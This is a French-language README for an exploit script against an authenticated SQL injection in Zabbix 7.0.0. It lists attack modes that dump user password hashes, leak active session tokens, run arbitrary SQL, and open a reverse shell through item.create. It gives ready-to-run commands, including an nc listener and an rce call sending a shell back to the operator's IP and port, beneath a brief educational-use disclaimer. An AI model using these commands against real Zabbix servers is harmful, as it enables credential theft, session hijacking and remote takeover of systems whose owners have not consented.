
Ceci est à des fins éducatives uniquement. Veuillez ne pas l'utiliser contre des systèmes non autorisés.
Un script Python pour exploiter une vulnérabilité d'injection SQL authentifiée sur Zabbix 7.0.0, prenant en charge plusieurs modes d'action incluant l'extraction de données utilisateur, la fuite de jetons de session, l'exécution de commandes à distance (RCE) et l'injection de requêtes personnalisées.
⚠️ AVERTISSEMENT :
Ce script est destiné uniquement à des fins éducatives et de tests d'intrusion autorisés.
Ne l'utilisez pas sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite.
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.
requestsInstallez les dépendances si nécessaire :
pip install requests
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
| Mode | Description | Nécessite un jeton admin |
|---|---|---|
| leak-users | Extrait tous les IDs utilisateur, noms d'utilisateur, hachages de mots de passe et rôles | ❌ |
| leak-tokens | Extrait tous les IDs de session actifs de la base de données | ❌ |
| rce | Lance un shell inversé via l'exploitation de item.create | ✅ |
| custom | Exécute toute requête SQL personnalisée via l'injection | ❌ |
Extraction des hachages utilisateur
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
Fuite de jetons de session
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
Exécution de code à distance (Shell inversé)
# Lancez d'abord un écouteur :
nc -lvnp 9001
# Exécutez ensuite :
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
Injection SQL personnalisée
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
sqliZabbix.py # Script d'exploitation principal
README.md # Cette documentation
Anthony (@874anthony)
Conçu avec amour et curiosité 🐍
Ce projet est publié sous la licence MIT. Veuillez l'utiliser de manière responsable.